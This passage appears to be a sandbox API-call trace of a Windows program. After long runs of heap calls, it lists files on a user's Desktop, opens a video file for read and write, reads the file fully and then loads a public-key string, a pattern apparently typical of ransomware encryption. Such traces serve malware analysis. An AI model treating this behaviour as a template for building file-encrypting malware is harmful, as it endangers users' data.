lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.818] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\") returned="sj76aMesI3jmtOuE2hz\\" [0195.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0195.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.818] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0195.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0195.819] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.819] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.820] PathFindFileNameW (pszPath="") returned="" [0195.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0195.820] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44854050, ftCreationTime.dwHighDateTime=0x1d896da, ftLastAccessTime.dwLowDateTime=0xc153cac0, ftLastAccessTime.dwHighDateTime=0x1d897f7, ftLastWriteTime.dwLowDateTime=0xc153cac0, ftLastWriteTime.dwHighDateTime=0x1d897f7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.821] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44854050, ftCreationTime.dwHighDateTime=0x1d896da, ftLastAccessTime.dwLowDateTime=0xc153cac0, ftLastAccessTime.dwHighDateTime=0x1d897f7, ftLastWriteTime.dwLowDateTime=0xc153cac0, ftLastWriteTime.dwHighDateTime=0x1d897f7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.821] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b652eb0, ftCreationTime.dwHighDateTime=0x1d898e0, ftLastAccessTime.dwLowDateTime=0x2168b310, ftLastAccessTime.dwHighDateTime=0x1d89976, ftLastWriteTime.dwLowDateTime=0x2168b310, ftLastWriteTime.dwHighDateTime=0x1d89976, nFileSizeHigh=0x0, nFileSizeLow=0x9a4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6pW8RpGL-.flv", cAlternateFileName="6PW8RP~1.FLV")) returned 1 [0195.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0195.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.822] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\6pW8RpGL-.flv") returned=".flv" [0195.822] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\6pW8RpGL-.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\6pw8rpgl-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.822] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=39503) returned 1 [0195.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.826] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9a29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.826] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.828] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.828] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x9a4f, lpOverlapped=0x0) returned 1 [0195.829] lstrlenA (lpString="-----BEGIN PUBLIC 